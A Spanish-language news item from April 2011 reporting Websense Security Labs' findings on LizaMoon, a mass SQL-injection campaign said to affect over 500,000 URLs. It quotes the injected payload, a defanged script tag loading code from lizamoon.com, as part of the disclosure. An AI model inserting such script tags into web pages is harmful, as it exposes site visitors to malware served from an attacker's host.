Campaña masiva afecta a más de 500,000 URLs

Por Mundo Contact | 11 abril 2011 | Tecnología

Websense Security Labs y la Websense Threatseeker Network identificaron una nueva campaña maliciosa de inyección masiva a la que denominamos LizaMoon. Los clientes de Websense están protegidos mediante el Advanced Classification Engine. La inyección masiva LizaMoon es un ataque de inyección de SQL que inserta la siguiente línea en el código de la página:

<script src=hxxp://lizamoon.com/ur.php></script>

“Si bien en un inicio tuvo 28,000 impactos ahora estamos viendo más de 500,000 URLs infectados lo que hace a la inyección masiva LizaMoon una de las campañas de inyección masiva más grandes que hayamos visto. Hemos estado monitoreando el ataque desde que surgió y notamos que el número de URLs comprometidos sigue aumentando así como el de dominios – diferentes sitios  cargados han comenzado a involucrarse además del lizamoon.com original. Los sitios con carga permanecen inactivos actualmente aunque podrían ser ‘encendidos’ en cualquier momento. Sólo podemos especular en cuanto a lo que los chicos malos están esperando”, señaló Carl Leonard, de Websense Security Labs.

También hemos podido identificar varios  URLs a los que se inyectó de la misma forma por lo que el ataque es aún mayor de lo que pensamos en un inicio. Una búsqueda en Google arroja más de 1,500,000 resultados que tienen un enlace con la misma estructura de URL que el ataque inicial. Los resultados de búsqueda de Google no siempre son los mejores indicadores de cuánto se ha extendido un ataque ya que cuentan cada URL o página únicos no el sitio o el dominio pero sí puede indicar el ámbito del problema si se observa cómo crecen o disminuyen los números con el tiempo.

“Websense Security Labs Research muestra que casi el 80 por ciento de los sitios maliciosos son sitios legítimos que han sido infectados. Infortunadamente, estos recientes ataques son más ejemplos de esta ola continua”, agregó.

Websense Security Labs seguirá monitoreando este ataque de inyección masiva y dará a conocer información de último momento cuando esté disponible. Para consultar las preguntas frecuentes y ver un video que muestra lo que sucede cuando un usuario visita un sitio al que se ha inyectado el script LizaMoon, visite nuestro blog.